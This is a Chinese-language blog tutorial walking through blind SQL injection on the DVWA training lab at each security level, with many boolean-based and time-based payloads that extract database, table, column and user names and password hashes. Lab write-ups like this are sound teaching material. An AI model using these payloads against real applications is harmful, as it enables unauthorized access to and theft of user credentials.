起个名字想上天
起个名字想上天

DVWA——sql盲注

一、盲注

与sql注入区别:

盲注只回复是或否,Sql注入回复详细信息;

过程:

1、判断是否存在注入,注入时字符型还是数字型

2、猜解数据库的长度,猜解数据库的名称

3、猜解数据库中有几个表,猜解表的长度,猜解表的名称

4、猜解表中有几个字段、猜解字段长度,猜解字段名称

5、猜解数据

类型:

基于布尔型的盲注

基于时间的盲注

基于报错的盲注

二、思路

手工盲注,因为服务器只会回答存在或者不存在,所以通过设定是否条件,逐步接近想要知道的答案(类似于猜价格)。因为手动注入过于繁琐,这里只是为了理解其原理,所有实验中大多都已知条件真假,是采用反证法来验证语法的正确,节约时间,完整的过程由程序来完成更加合适。

三、sql盲注——low

实验环境:

DVWA——sql盲注_第1张图片

DVWA——sql盲注_第2张图片

源码分析

DVWA——sql盲注_第3张图片

未对参数进行任何检查、过滤,存在明显sql注入漏洞,返回结果只有种,user id exiets in the database;和user id is missing from the database

  • 基于布尔型的盲注

1、判断是否存在注入,注入时字符型还是数字型

DVWA——sql盲注_第4张图片

DVWA——sql盲注_第5张图片

DVWA——sql盲注_第6张图片

证明存在字符型注入漏洞

2、猜解数据库的长度,猜解数据库的名称

1' and length(database())=1#  //尝试数据库库名长度是否为1,当然这是只有一个库的情况

DVWA——sql盲注_第7张图片

1不成功,接着尝试,直到返回已存在

DVWA——sql盲注_第8张图片

证明整个库名长度为4

①猜解第1个字母

采用二分法的方式,逐步逼近,得到字符,substr函数用法参见九(附录)

1' and ascii(substr(database(),1,1))>97#

DVWA——sql盲注_第9张图片

DVWA——sql盲注_第10张图片

DVWA——sql盲注_第11张图片

DVWA——sql盲注_第12张图片

类似最终缩小范围,确定为100(d)

DVWA——sql盲注_第13张图片

②猜解第2个字母

DVWA——sql盲注_第14张图片

类似最终缩小范围,确定为118(v)

③猜解第3个字母

DVWA——sql盲注_第15张图片

④猜解第4个字母

DVWA——sql盲注_第16张图片

所以数据库名就是dvwa

3、猜解数据库中有几个表,猜解表的长度,猜解表的名称

①猜解表的个数

1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2#

DVWA——sql盲注_第17张图片

②猜解第一个表的表名长度

1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9#

DVWA——sql盲注_第18张图片

这里出现了limit,再举一个例子,方便理解limit

1' and length(substr((select table_name from information_schema.tables where table_schema=’dvwa’ limit 0,1),2))=8#

DVWA——sql盲注_第19张图片

③猜解表2的表名长度

1' and length(substr((select table_name from information_schema.tables where table_schema=’dvwa’  limit 1,1),1))=5#

DVWA——sql盲注_第20张图片

④猜解表1名称

先猜解第一个字母,依旧是二分法逼近,最后得到是g

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103#

DVWA——sql盲注_第21张图片

DVWA——sql盲注_第22张图片

依次类推最后得到表1完整名称是guestbook,这个表并不是我们想要了解的,所以去看表2

⑤猜解表2名称

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=117#

DVWA——sql盲注_第23张图片

依次猜解得到表2的名称是users,就搞他了

4、猜解表中有几个字段、猜解字段长度,猜解字段名称

1' and (select count(column_name) from information_schema.columns where table_name='users')=8#

DVWA——sql盲注_第24张图片

猜解字段长度

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7#

DVWA——sql盲注_第25张图片

猜解字段名称(我需要知道数据库中这个users表的每一列的列名)

1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=117#

DVWA——sql盲注_第26张图片

第二列的第一个字母只需修改limit 为1 1 1

5、猜解数据

上一步最后得到各列的列名,这里以user和password为例

①猜测第一个用户的用户名为admin,则第一个字母为a,测试

1' and ascii(substr((select user from users limit 0,1),1,1))=97#

DVWA——sql盲注_第27张图片

第二个字母d

1' and ascii(substr((select user from users limit 0,1),2,1))=100#

第三个字母m

1' and ascii(substr((select user from users limit 0,1),3,1))=109#

②另一个例子:第二个用户的用户名Gordonb

第一个字母g

1' and ascii(substr((select user from users limit 1,1),1,1))=103#

第二个字母o

1' and ascii(substr((select user from users limit 1,1),2,1))=111#

③再举一个例子:第三个用户的用户名pablo

第一个字母p

1' and ascii(substr((select user from users limit 3,1),1,1))=112#

第二个字母a

1' and ascii(substr((select user from users limit 3,1),2,1))=97#

当然上面这些猜解都是在已知用户名密码的情况下,进行的逆向的验证,方便理解各参数的作用,在真实sql盲注时,我们需要依照此规律,进行循环的遍历。最终得到所有的用户名。

由于在该源码中,对于密码进行了hash,我们需要繁琐的遍历,依次得到所有账户对应的密码hash值,再对该hash值碰撞攻击(在网站中搜索该hash值对应的明文)

  • 基于时间的盲注

猜解步骤与基于布尔型的盲注基本相同,只是将判定条件换为sleep(5)是否执行

1、判断是否存在注入,注入时字符型还是数字型

DVWA——sql盲注_第28张图片

不要去关注输出结果,这里如果时字符型注入,则浏览器会延时等待五秒钟,若不是,则会很快返回信息。这里等待了五秒,是字符注入

2、猜解数据库的长度,猜解数据库的名称

1' and if (length(database())=4,sleep(5),1)#

DVWA——sql盲注_第29张图片

猜解数据库名:

DVWA——sql盲注_第30张图片

1' and if (ascii(substr(database(),2,1))=118,sleep(5),1)#  

//第二个字母是v

1' and if (ascii(substr(database(),3,1))=119,sleep(5),1)#

//第三个字母是w

1' and if (ascii(substr(database(),4,1))=97,sleep(5),1)#

//第四个字母是a

依次验证出数据库全名为dvwa

3、猜解数据库中有几个表,猜解表的长度,猜解表的名称

①dvwa库中表的个数

1' and if((select count(table_name) from information_schema.tables where table_schema=‘dvwa’)=2,sleep(5),1)#

DVWA——sql盲注_第31张图片

②得到表的个数2后,猜解第一个表的表名长度

1' and if(length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9,sleep(5),1)#

DVWA——sql盲注_第32张图片

③猜解第二个表的长度

1' and if(length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5,sleep(5),1)#

DVWA——sql盲注_第33张图片

也可以这样写

1' and if(length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2))=4,sleep(5),1)#

DVWA——sql盲注_第34张图片

④猜解表1表名

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103,sleep(5),1)#

//这里解析出了字母g

DVWA——sql盲注_第35张图片

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),9))=107,sleep(5),1)#

//这里解析出了字母k

DVWA——sql盲注_第36张图片

依次解析出表1名称为guestbook

⑤猜解表2表名

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=117,sleep(5),1)#

//这里猜解出字母u,验证成功

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2))=115,sleep(5),1)#

//这里猜解出字母s,验证成功

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),3))=101,sleep(5),1)#

//这里猜解出字母e,验证成功

依次猜解得到表名users

4、猜解表中有几个字段、猜解字段长度,猜解字段名称

①猜解表中有几个字段(users表)

1' and if((select count(column_name) from information_schema.columns where table_name='users')=8,sleep(5),1)#

②猜解每个字段长度(以user_id为例)

1' and if(length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7,sleep(5),1)#

//验证得出user_id字段长度为7

③猜解字段名称(以user_id为例)

1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=117,sleep(5),1)#

//这里猜解的是字母u

5、猜解数据

1' and if(ascii(substr((select user from users limit 0,1),1,1))=97,sleep(5),1)#

//admin用户的a

1' and if(ascii(substr((select user from users limit 1,1),1,1))=103,sleep(5),1)#

// Gordonb用户的第一个字母g

1' and if(ascii(substr((select user from users limit 3,1),1,1))=112,sleep(5),1)#

/ pablo用户的第一个字母p

四、sql盲注——medium

DVWA——sql盲注_第37张图片

DVWA——sql盲注_第38张图片

源码分析

DVWA——sql盲注_第39张图片

利用mysql_real_escape_string函数对特殊符号进行转义,同时设置下拉菜单,控制用户输入,但是可以通过burpsuite抓包改包,存在数据型sql注入

DVWA——sql盲注_第40张图片

  • 基于布尔型的盲注

DVWA——sql盲注_第41张图片

余下操作与low级别类似,只是改包位置不同,结尾不用加#

  • 基于时间的盲注

同上,观察延迟

五、sql盲注——high

DVWA——sql盲注_第42张图片

源码分析

DVWA——sql盲注_第43张图片

使用limit限制,但是可以通过#将其注释,存在字符型注入漏洞

需要注意,high级别不适宜使用基于时间的盲注,因为服务器会随机指定延迟时间,容易引起误判。

  • 基于布尔型的盲注

DVWA——sql盲注_第44张图片

余下操作与low级别一致。

六、sql注入——impossible

DVWA——sql盲注_第45张图片

查看源码                      

DVWA——sql盲注_第46张图片

使用pdo技术,没得玩,同时返回的查询结果为1,才会输出

七、附录

Substr用法:

实例:

$rest1 = substr("abcdef", 0, 0); // returns ""
$rest2 = substr("abcdef", 0, 2); // returns "ab"
$rest3 = substr("abcdef", 0, -1); // returns "abcde"
$rest4 = substr("abcdef", 2,0); // returns ""
$rest5 = substr("abcdef", 2,2); // returns "cd"
$rest6 = substr("abcdef", 2, -1); // returns "cde"
$rest7 = substr("abcdef", -2,0); // returns ""
$rest8 = substr("abcdef", -2,2); // returns "ef"
$rest9 = substr("abcdef", -2,-1); // returns "e"

你可能感兴趣的:(DVWA——sql盲注)

  • undo log ,redo log 和binlog的区别? 努力向前ing MySQL八股详究数据库MySQLlog
    一.MySQL如何保证事务的一致性?两阶段锁:prepare阶段:1.写入redolog(prepare)2.通知server准备写入binlogcommit阶段:1.写入binlog2.提交redolog二.有了binlog为什么还要记录redolog?binlog和redolog虽然都是为了数据安全与恢复准备的,但是他们的侧重点和功能有所不同,binlog记录的是SQL语句,属于逻辑日志,可以
  • 基于oracle linux的 DBI/DBD 标准化安装文档(三) oracle
    一、安装DBIDBI(DatabaseInterface)是perl连接数据库的接口。其是perl连接数据库的最优方法,他支持包括Orcale,Sybase,mysql,db2等绝大多数的数据库,下面将简要介绍其安装方法。1.1解压tar-zxvfDBI-1.616_901.tar.gz1.2安装依赖yuminstallperl-ExtUtils-CBuilderperl-ExtUtils-Mak
  • FerretDB 2.0:开源 MongoDB 替代品的安装与使用指南 田猿笔记 MongoDB开源数据库FerretDB
    介绍FerretDB2.0是一个开源数据库,旨在作为MongoDB的替代品。它与MongoDB5.0+的驱动程序和工具兼容,适合需要避免MongoDB许可复杂性的开发者。它的核心特点是使用PostgreSQL作为后端,并通过DocumentDB扩展提升性能,研究表明某些工作负载可快20倍。安装与使用安装FerretDB2.0使用dockercompose需要以下步骤:创建docker-compos
  • 力扣SQL题记录(持续) Dxecozy leetcodesql
    此贴用于个人写SQL题记录,主要是用于记录新的知识和一些个人觉得的难题思路,便于复习目录Leetcode高频SQL50题基本题基本条件筛选多表连接新知识CHAR_LENGTH()函数的使用,用于计算字符长度Leetcode高频SQL50题基本题基本条件筛选1757.可回收且低脂的产品584.寻找用户推荐人595.大的国家1148.文章浏览I多表连接1378.使用唯一标识码替换员工ID新知识CHAR
  • 数据库管理-第303期 数据库相关硬件文章汇总(20250319) 胖头鱼的鱼缸(尹海文) 数据库数据库
    数据库管理303期2025-03-19数据库管理-第303期数据库相关硬件文章汇总(20250319)1CPU&内存2SSD3RDMA4存储5CXL6硬件采购7数据库一体机总结数据库管理-第303期数据库相关硬件文章汇总(20250319)作者:胖头鱼的鱼缸(尹海文)OracleACEPro:DatabasePostgreSQLACEPartner10年数据库行业经验拥有OCM11g/12c/19
  • 数据库管理-第304期 业绩?有绩无业!(20250320) 胖头鱼的鱼缸(尹海文) 数据库数据库oracle
    数据库管理304期2025-03-20数据库管理-第304期业绩?有绩无业!(20250320)1词解2跑偏3活动预告总结数据库管理-第304期业绩?有绩无业!(20250320)作者:胖头鱼的鱼缸(尹海文)OracleACEPro:DatabasePostgreSQLACEPartner10年数据库行业经验拥有OCM11g/12c/19c、MySQL8.0OCP、Exadata、CDP等认证墨天
  • 【mysql】mysql之主从部署以及介绍 向往风的男子 DBAmysql数据库
    本站以分享各种运维经验和运维所需要的技能为主《python零基础入门》:python零基础入门学习《python运维脚本》:python运维脚本实践《shell》:shell学习《terraform》持续更新中:terraform_Aws学习零基础入门到最佳实战《k8》从问题中去学习k8s《docker学习》暂未更新《ceph学习》ceph日常问题解决分享《日志收集》ELK+各种中间件《运维日常》
  • mysql5.6主从_MySQL5.6主从复制最佳实践 来B mysql5.6主从
    MySQL5.6主从复制的配置环境操作系统:CentOS-6.6-x86_64MySQL版本:mysql-5.6.26.tar.gz主节点IP:192.168.31.57主机名:edu-mysql-01从节点IP:192.168.31.59主机名:edu-mysql-02MySQL主从复制官方文档MySQL主从复制(也称A/B复制)的原理Master将数据改变记录到二进制日志(binarylog)
  • MySQL5.6主从复制最佳实践 weixin_34252090 数据库操作系统python
    2019独角兽企业重金招聘Python工程师标准>>>MySQL5.6主从复制最佳实践MySQL5.6主从复制的配置环境操作系统:CentOS-6.6-x86_64MySQL版本:mysql-5.6.26.tar.gz主节点IP:192.168.31.57主机名:edu-mysql-01从节点IP:192.168.31.59主机名:edu-mysql-02MySQL主从复制官方文档http://d
  • MySQL 8主从复制配置最佳实践 随风九天 匠心数据库部署运维mysql主从复制
    1.引言1.1主从复制的意义与应用场景主从复制是MySQL中用于提高数据冗余性和可用性的技术。通过将主库的数据复制到一个或多个从库,可以在主库故障时快速切换到从库,保证服务的连续性。此外,主从复制还可以用于负载均衡,将读操作分发到从库,减轻主库的压力。1.2MySQL8主从复制的新特性概述MySQL8引入了多项改进,包括:GTID(全局事务标识符):简化复制配置和管理。半同步复制:提高数据一致性。
  • Mybatis 使用<update>中<set>标签的简明例子 成功人chen某 mybatisjava前端
    注:xxx为某某某的意思updatexxxSQL1,SQL2,whereSQL3如果成立,不成立则最终SQL语句为updatexxxsetSQL1whereSQL3;会自动去掉SQL1,尾部的逗号,并加上set如果均成立则最终SQL语句为updatexxxsetSQL1,SQL2whereSQL3;实际例子UPDATEtable_nameSETcolumn1=value1,column2=valu
  • SQL优化之MySQL执行计划(Explain)及索引失效详解 一未道 #性能优化大数据sqlmysql数据库
    1、执行计划基础1.1、执行计划(Explain)定义在MySQL中可以通过explain关键字模拟优化器执行SQL语句,从而解析MySQL是如何处理SQL语句的。1.2、MySQL查询过程客户端向MySQL服务器发送一条查询请求服务器首先检查查询缓存,如果命中缓存,则立刻返回存储在缓存中的结果。否则进入下一阶段服务器进行SQL解析、预处理、之后由优化器生成对应的执行计划MySQL根据执行计划,调
  • Mysql相关知识:存储引擎、sql执行流程、索引失效 Cachel wood sql语言sqlserver+mysqlmysqlsqlandroidab测试算法人工智能前端框架
    文章目录MySQL存储引擎一、MySQL存储引擎概述二、常见存储引擎对比三、核心引擎详解1.InnoDB2.MyISAM四、如何选择存储引擎?五、引擎操作命令1.查看表的存储引擎2.修改表的存储引擎3.引擎与性能优化六、示例对比场景:频繁更新的订单表vs只读的产品分类表七、总结索引失效1.索引列使用函数或表达式2.隐式类型转换3.范围查询右侧的索引列失效4.模糊查询以通配符开头5.OR条件导致索引
  • Python,C++开发餐饮后厨环境远程管理APP Geeker-2025 pythonc++
    开发一款用于**餐饮后厨环境远程管理**的App,结合Python和C++的优势,可以实现高效的后端数据处理、实时的环境监控以及用户友好的前端界面。以下是一个详细的开发方案,涵盖技术选型、功能模块、开发步骤等内容。##技术选型###后端(Python)-**编程语言**:Python-**Web框架**:Django或Flask-**数据库**:PostgreSQL或MySQL-**实时通信**:
  • Python 的 ORM(Object-Relational Mapping)工具浅讲 Code_Geo python开发语言
    SQLAlchemy相关讲解1.SQLAlchemy是什么?定义:一个Python的ORM(Object-RelationalMapping)工具,允许开发者通过Python类与对象操作数据库,而非直接编写SQL。核心组件:Core:底层SQL表达式语言,提供数据库无关的SQL操作接口。ORM:基于Core的高层抽象,将数据库表映射为Python类(模型),记录映射为对象。适用场景:需要灵活操作数
  • Apache Doris整合Iceberg + Flink CDC构建实时湖仓体的联邦查询分析架构 MfvShell apacheflink架构Flink
    随着大数据技术的迅猛发展,构建实时湖仓体并进行联邦查询分析成为了许多企业的迫切需求。在这篇文章中,我们将探讨如何利用ApacheDoris整合Iceberg和FlinkCDC来构建这样一个架构,并提供相应的源代码示例。简介实时湖仓体是一种灵活、可扩展的数据架构,结合了数据湖和数据仓库的优势。ApacheDoris是一款开源的分布式SQL引擎,专注于实时分析和查询。Iceberg是一种开放式表格格式
  • NL2SQL 优化之 Schema 编写标准 kakaZhui oracle数据库AIGCpythonllamachatgpt
    写在前面在自然语言转SQL(NL2SQL,或Text-to-SQL)任务中,数据库Schema的质量和表示方式对模型的性能有着至关重要的影响。一个清晰、规范、易于理解的Schema能够帮助模型更好地理解数据库结构,从而生成更准确的SQL查询。相反,一个混乱、不规范的Schema会增加模型的理解难度,导致生成的SQL查询错误百出。本文将深入探讨NL2SQL任务中Schema的编写标准,详细介绍如何为
  • Flink读取kafka数据并写入HDFS 王知无(import_bigdata) Flink系统性学习专栏hdfskafkaflink
    硬刚大数据系列文章链接:2021年从零到大数据专家的学习指南(全面升级版)2021年从零到大数据专家面试篇之Hadoop/HDFS/Yarn篇2021年从零到大数据专家面试篇之SparkSQL篇2021年从零到大数据专家面试篇之消息队列篇2021年从零到大数据专家面试篇之Spark篇2021年从零到大数据专家面试篇之Hbase篇
  • 【数据库】MySQL的索引详解 此木|西贝 数据库数据库mysql
    简介索引是一种用于快速查询和检索数据的数据结构,类似于书的目录。在几百页的书通过几页目录就可以精确定位到我们想看的章节优点和缺点优点正确的使用索引可以大大提高检索速度可以使用唯一索引保证数据在库中的唯一性使用聚合索引减少回表,降低IO次数缺点索引不宜创建的太多,否则增删改时不仅修改数据,还要修改大量的索引数据索引也会占用磁盘空间索引结构B树:多路平衡查找树,B树的所有节点都会存储key(索引)和d
  • 【数据库】MySQL事务详解 此木|西贝 数据库数据库mysql
    事务的隔离级别读未提交(read-uncommitted):最低级的隔离级别,允许其他事务读到未提交的值;读已提交(read-committed):事务只能读取到其他事务提交的数据;可重复读(repeatable-read):对同一条数据多次读取结果都是一样(mysql默认隔离级别);串行化(serializable):最高的隔离级别,所有事务穿行执行,事务间不会产生干扰隔离级别存在的问题读未提交
  • 如何在MySQL中创建定时任务? 数据库mysql
    在mysql中我们可以可以通过事件调度器(EventScheduler),让MySQL定时为我们执行一些任务。例如:在MySQL中实现每天凌晨0点定时清空指定的test表,并在一个月后自动停止该定时任务。以下是完整步骤:步骤1:启用MySQL事件调度器默认情况下事件调度器可能关闭,需手动启用:--临时启用(重启失效)SETGLOBALevent_scheduler=ON;--永久启用(修改配置文件
  • 使用sqlite创建数据库 @云初 sqlite数据库database
    使用sqlite创建数据库#sqlite3.exe数据库名.dbSQLiteversion3.36.02021-06-1818:36:39Enter".help"forusagehints.sqlite>在sqlite里面创建一张表并添加数据#.databases#.tables#createtableperson(idint,namevarchar(20),addressvarchar(20))
  • 扩展 MyBatis-Plus 支持的查询条件 drebander mybatis-plus数据库mybatispythonMybatis-Plus
    MyBatis-Plus是一个强大的MyBatis增强工具,提供了丰富的查询条件构造器和便捷的CRUD操作。然而,在实际开发中,我们可能会遇到一些复杂的查询需求,需要扩展MyBatis-Plus的功能。本文将详细介绍如何扩展MyBatis-Plus支持的查询条件,包括自定义SQL查询、Lambda查询与条件构造器扩展、动态查询条件的实现,以及扩展自定义查询方法与接口。1.自定义SQL查询1.1使用
  • mysql8.4.4+keepalived高可用部署 平山海D mysql
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、安装mysql(两节点都安装)二、安装keepalived(两节点都安装)三、修改mysql配置四、修改keepalived配置五、验证备注前言内网环境下,mysql8.4.4+keepalived高可用部署,仅作备份记录一、安装mysql(两节点都安装)从mysql官网离线下载mysql-8.4.4-1.el8.x8
  • 数据分析 SQL 面试全攻略,看这篇就够了! 程功学 数据分析sql面试
    数据分析SQL面试八股文(含答案)已经打包好,看文末领取在数据分析领域,SQL技能堪称基石,也是众多企业在招聘数据分析岗位时重点考察的内容。今天,就为大家深度剖析数据分析SQL面试的要点,助力大家顺利通关。一、常见面试题型大揭秘(一)简单查询这类题目通常要求考生从单表中检索数据。例如,给定一个“员工信息表”,包含员工编号、姓名、年龄、部门等字段,题目可能是“查询年龄大于30岁的员工姓名和部门”。解
  • SQL分类 penglaifei Websql数据库
    DDL(DataDefiationLanguage)数据定义语言,用来定义数据库对象(数据库、表、字段)数据库操作——查询所有数据库:show.databases;注:information_schemamysqlperformance_schemasys是系统自带的数据库——查询当前数据库selectdatabase();——使用/切换数据库usename#数据库名;——创建数据库(数据库名不可
  • 计算机毕业设计之基于Hadoop的热点新闻分析系统的设计与实现 微信bishe69 课程设计pythondjangomysql
    近些年来,随着科技的飞速发展,互联网的普及逐渐延伸到各行各业中,给人们生活带来了十分的便利,热点新闻分析系统利用计算机网络实现信息化管理,使整个热点新闻分析的发展和服务水平有显著提升。本文拟采用PyCharm开发工具,django框架、Python语言、Hadoop大数据处理技术进行开发,后台使用MySQL数据库进行信息管理,设计开发的热点新闻分析系统。通过调研和分析,系统拥有管理员和用户两个模块
  • Oracle 19c数据库REDO日志更换 deadknight9 Oracle运维oracle数据库
    一、增加新日志组,并放在不同磁盘SQL>alterdatabaseaddlogfilethread1group10('+DATA','+OCR')size50M;Databasealtered.SQL>alterdatabaseaddlogfilethread1group11('+DATA','+OCR')size50M;Databasealtered.SQL>alterdatabaseaddlo
  • 如何在MySQL中创建定时任务? 云心雨禅 技术实操mysql数据库
    在mysql中我们可以可以通过事件调度器(EventScheduler),让MySQL定时为我们执行一些任务。例如:在MySQL中实现每天凌晨0点定时清空指定的test表,并在一个月后自动停止该定时任务。以下是完整步骤:步骤1:启用MySQL事件调度器默认情况下事件调度器可能关闭,需手动启用:--临时启用(重启失效)SETGLOBALevent_scheduler=ON;--永久启用(修改配置文件
  • 计算机毕业设计PHP保利和院物业服务管理系统小程序(源码+程序+uni+lw+部署) 计算机专业毕设程序 课程设计php小程序
    该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。欢迎交流项目运行环境配置:phpStudy+Vscode+Mysql5.7+HBuilderX+Navicat11+Vue+Express。项目技术:原生PHP++Vue等等组成,B/S模式+Vscode管理+前后端分离等等。环境需要1.运行环境:最好是小皮phpstudy最新版,我们在这个版本上开发的。其他版本理论上也可以。2.开发
  • Java 并发包之线程池和原子计数 lijingyao8206 Java计数ThreadPool并发包java线程池
    对于大数据量关联的业务处理逻辑,比较直接的想法就是用JDK提供的并发包去解决多线程情况下的业务数据处理。线程池可以提供很好的管理线程的方式,并且可以提高线程利用率,并发包中的原子计数在多线程的情况下可以让我们避免去写一些同步代码。     这里就先把jdk并发包中的线程池处理器ThreadPoolExecutor 以原子计数类AomicInteger 和倒数计时锁C
  • java编程思想 抽象类和接口 百合不是茶 java抽象类接口
    接口c++对接口和内部类只有简介的支持,但在java中有队这些类的直接支持   1 ,抽象类 :  如果一个类包含一个或多个抽象方法,该类必须限定为抽象类(否者编译器报错)   抽象方法 : 在方法中仅有声明而没有方法体    package com.wj.Interface;
  • [房地产与大数据]房地产数据挖掘系统 comsci 数据挖掘
           随着一个关键核心技术的突破,我们已经是独立自主的开发某些先进模块,但是要完全实现,还需要一定的时间...        所以,除了代码工作以外,我们还需要关心一下非技术领域的事件..比如说房地产     &nb
  • 数组队列总结 沐刃青蛟 数组队列
          数组队列是一种大小可以改变,类型没有定死的类似数组的工具。不过与数组相比,它更具有灵活性。因为它不但不用担心越界问题,而且因为泛型(类似c++中模板的东西)的存在而支持各种类型。      以下是数组队列的功能实现代码:   import List.Student; public class
  • Oracle存储过程无法编译的解决方法 IT独行者 oracle存储过程 
    今天同事修改Oracle存储过程又导致2个过程无法被编译,流程规范上的东西,Dave 这里不多说,看看怎么解决问题。   1.     查看无效对象 XEZF@xezf(qs-xezf-db1)> select object_name,object_type,status from all_objects where status='IN
  • 重装系统之后oracle恢复 文强chu oracle
    前几天正在使用电脑,没有暂停oracle的各种服务。 突然win8.1系统奔溃,无法修复,开机时系统 提示正在搜集错误信息,然后再开机,再提示的无限循环中。 无耐我拿出系统u盘 准备重装系统,没想到竟然无法从u盘引导成功。 晚上到外面早了一家修电脑店,让人家给装了个系统,并且那哥们在我没反应过来的时候, 直接把我的c盘给格式化了 并且清理了注册表,再装系统。 然后的结果就是我的oracl
  • python学习二( 一些基础语法) 小桔子 pthon基础语法
    紧接着把!昨天没看继续看django 官方教程,学了下python的基本语法 与c类语言还是有些小差别: 1.ptyhon的源文件以UTF-8编码格式 2. /   除 结果浮点型 //  除 结果整形 %   除 取余数 *   乘 **  乘方 eg 5**2 结果是5的2次方25 _&
  • svn 常用命令 aichenglong SVN版本回退
    1 svn回退版本   1)在window中选择log,根据想要回退的内容,选择revert this version或revert chanages from this version 两者的区别:   revert this version:表示回退到当前版本(该版本后的版本全部作废)   revert chanages from this versio
  • 某小公司面试归来 alafqq 面试
    先填单子,还要写笔试题,我以时间为急,拒绝了它。。时间宝贵。 老拿这些对付毕业生的东东来吓唬我。。 面试官很刁难,问了几个问题,记录下; 1,包的范围。。。public,private,protect. --悲剧了 2,hashcode方法和equals方法的区别。谁覆盖谁.结果,他说我说反了。 3,最恶心的一道题,抽象类继承抽象类吗?(察,一般它都是被继承的啊) 4,stru
  • 动态数组的存储速度比较 集合框架 百合不是茶 集合框架
    集合框架: 自定义数据结构(增删改查等) package 数组; /** * 创建动态数组 * @author 百合 * */ public class ArrayDemo{ //定义一个数组来存放数据 String[] src = new String[0]; /** * 增加元素加入容器 * @param s要加入容器
  • 用JS实现一个JS对象,对象里有两个属性一个方法 bijian1013 js对象
    <html> <head> </head> <body> 用js代码实现一个js对象,对象里有两个属性,一个方法 </body> <script> var obj={a:'1234567',b:'bbbbbbbbbb',c:function(x){
  • 探索JUnit4扩展:使用Rule bijian1013 java单元测试JUnitRule
            在上一篇文章中,讨论了使用Runner扩展JUnit4的方式,即直接修改Test Runner的实现(BlockJUnit4ClassRunner)。但这种方法显然不便于灵活地添加或删除扩展功能。下面将使用JUnit4.7才开始引入的扩展方式——Rule来实现相同的扩展功能。 1. Rule       &n
  • [Gson一]非泛型POJO对象的反序列化 bit1129 POJO
    当要将JSON数据串反序列化自身为非泛型的POJO时,使用Gson.fromJson(String, Class)方法。自身为非泛型的POJO的包括两种: 1. POJO对象不包含任何泛型的字段 2. POJO对象包含泛型字段,例如泛型集合或者泛型类 Data类 a.不是泛型类, b.Data中的集合List和Map都是泛型的 c.Data中不包含其它的POJO    
  • 【Kakfa五】Kafka Producer和Consumer基本使用 bit1129 kafka
    0.Kafka服务器的配置 一个Broker, 一个Topic Topic中只有一个Partition()   1. Producer: package kafka.examples.producers; import kafka.producer.KeyedMessage; import kafka.javaapi.producer.Producer; impor
  • lsyncd实时同步搭建指南——取代rsync+inotify ronin47
    1. 几大实时同步工具比较 1.1 inotify + rsync 最近一直在寻求生产服务服务器上的同步替代方案,原先使用的是 inotify + rsync,但随着文件数量的增大到100W+,目录下的文件列表就达20M,在网络状况不佳或者限速的情况下,变更的文件可能10来个才几M,却因此要发送的文件列表就达20M,严重减低的带宽的使用效率以及同步效率;更为要紧的是,加入inotify
  • java-9. 判断整数序列是不是二元查找树的后序遍历结果 bylijinnan java
    public class IsBinTreePostTraverse{ static boolean isBSTPostOrder(int[] a){ if(a==null){ return false; } /*1.只有一个结点时,肯定是查找树 *2.只有两个结点时,肯定是查找树。例如{5,6}对应的BST是 6 {6,5}对应的BST是
  • MySQL的sum函数返回的类型 bylijinnan javaspringsqlmysqljdbc
    今天项目切换数据库时,出错 访问数据库的代码大概是这样: String sql = "select sum(number) as sumNumberOfOneDay from tableName"; List<Map> rows = getJdbcTemplate().queryForList(sql); for (Map row : rows
  • java设计模式之单例模式 chicony java设计模式
    在阎宏博士的《JAVA与模式》一书中开头是这样描述单例模式的:   作为对象的创建模式,单例模式确保某一个类只有一个实例,而且自行实例化并向整个系统提供这个实例。这个类称为单例类。 单例模式的结构   单例模式的特点: 单例类只能有一个实例。 单例类必须自己创建自己的唯一实例。 单例类必须给所有其他对象提供这一实例。   饿汉式单例类   publ
  • javascript取当月最后一天 ctrain JavaScript
    <!--javascript取当月最后一天--> <script language=javascript> var current = new Date(); var year = current.getYear(); var month = current.getMonth(); showMonthLastDay(year, mont
  • linux tune2fs命令详解 daizj linuxtune2fs查看系统文件块信息
    一.简介: tune2fs是调整和查看ext2/ext3文件系统的文件系统参数,Windows下面如果出现意外断电死机情况,下次开机一般都会出现系统自检。Linux系统下面也有文件系统自检,而且是可以通过tune2fs命令,自行定义自检周期及方式。 二.用法: Usage: tune2fs [-c max_mounts_count] [-e errors_behavior] [-g grou
  • 做有中国特色的程序员 dcj3sjt126com 程序员
      从出版业说起 网络作品排到靠前的,都不会太难看,一般人不爱看某部作品也是因为不喜欢这个类型,而此人也不会全不喜欢这些网络作品。究其原因,是因为网络作品都是让人先白看的,看的好了才出了头。而纸质作品就不一定了,排行榜靠前的,有好作品,也有垃圾。 许多大牛都是写了博客,后来出了书。这些书也都不次,可能有人让为不好,是因为技术书不像小说,小说在读故事,技术书是在学知识或温习知识,有
  • Android:TextView属性大全 dcj3sjt126com textview
    android:autoLink    设置是否当文本为URL链接/email/电话号码/map时,文本显示为可点击的链接。可选值(none/web/email/phone/map/all)  android:autoText    如果设置,将自动执行输入值的拼写纠正。此处无效果,在显示输入法并输
  • tomcat虚拟目录安装及其配置 eksliang tomcat配置说明tomca部署web应用tomcat虚拟目录安装
    转载请出自出处:http://eksliang.iteye.com/blog/2097184 1.-------------------------------------------tomcat  目录结构 config:存放tomcat的配置文件 temp  :存放tomcat跑起来后存放临时文件用的 work   : 当第一次访问应用中的jsp
